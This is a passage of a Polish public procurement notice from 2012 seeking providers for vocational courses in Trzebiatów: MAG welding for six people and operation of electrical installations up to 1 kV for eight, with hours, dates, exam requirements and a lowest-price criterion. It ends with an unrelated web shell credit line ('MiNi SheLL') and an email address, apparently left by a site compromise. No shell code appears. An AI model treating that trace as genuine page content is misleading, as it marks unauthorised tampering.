<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa  przeprowadzenia szkolenia z zakresu spawania spoinami pachwinowymi metodą MAG (135).
2.Szkolenie odbędzie się w terminie 29.10-07.12.2012 dla 6 osób.  
3.Zamawiający przewiduje  140 godzin zajęć w tym 25 zajęć teoretycznych  i 115 godzin zajęć praktycznych na każdego uczestnika szkolenia.
4.Szkolenie teoretyczne odbędzie się w Ośrodku Szkolenia Zawodowego w Trzebiatowie, ul. Witosa 8. Zamawiający bezpłatnie udostępni wykonawcy pomieszczenia szkoleniowe.
5.Zamawiający wymaga, aby wykonawca zapewnił miejsce przeznaczone do prowadzenia zajęć praktycznych. Zamawiający zaleca, aby podczas zajęć praktycznych każdy z kursantów dysponował własnym (nie dzielonym z drugą osobą) stanowiskiem spawalniczym. Zamawiający dopuszcza możliwość szkolenia maksymalnie dwóch osób na jednym stanowisku spawalniczym.
6.Wykonawca zorganizuje dla uczestników szkolenia Egzamin w zakresie spawania elektrodą topliwą w osłonie gazów aktywnych (metoda MAG)  (135),  uprawniający do uzyskania odpowiedniego świadectwa kwalifikacyjnego.
7.Szkolenie powinno być prowadzone w zakresie niezbędnym do uzyskania teoretycznej i praktycznej wiedzy umożliwiającej zdanie egzaminu kwalifikacyjnego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 29.10.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Eksploatacja urządzeń, instalacji i sieci energetycznych o napięciu 1 kV.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest usługa  przeprowadzenia szkolenia z zakresu eksploatacja urządzeń, instalacji i sieci energetycznych o napięciu 1 kV .
2.Szkolenie odbędzie się w terminie 10.12-21.12.2012 dla 8 osób.  
3.Zamawiający przewiduje  65 godzin zajęć w tym 45 godzin zajęć teoretycznych  i 20 godzin zajęć praktycznych na każdego uczestnika szkolenia.
4.Szkolenie teoretyczne odbędzie się w Ośrodku Szkolenia Zawodowego w Trzebiatowie, ul. Witosa 8. Zamawiający bezpłatnie udostępni wykonawcy pomieszczenia szkoleniowe.
5.Zamawiający wymaga, aby wykonawca zapewnił miejsce przeznaczone do prowadzenia zajęć praktycznych.
6.Celem szkolenia jest przygotowanie uczestników do egzaminu kwalifikacyjnego z zakresu eksploatacji urządzeń, instalacji i sieci elektroenergetycznych do 1 kV.
7.Szkolenie zakończone musi zostać egzaminem przed Komisją Kwalifikacyjną działającą zgodnie z przepisami Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 28 kwietnia 2003r. w sprawie szczegółowych zasad stwierdzania posiadania kwalifikacji przez osoby zajmujące się eksploatacją urządzeń, instalacji i sieci, uprawniającym do uzyskania odpowiedniego świadectwa kwalifikacyjnego.
8.Wymagany zakres tematyczny szkolenia:
a)budowa urządzeń, instalacji i sieci elektroenergetycznych;
b)montaż urządzeń, instalacji i sieci elektroenergetycznych;
c)eksploatacja urządzeń, instalacji i sieci elektroenergetycznych;
d)bezpieczeństwo i higiena pracy osób zajmujących się eksploatacją urządzeń, instalacji i sieci elektroenergetycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 10.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com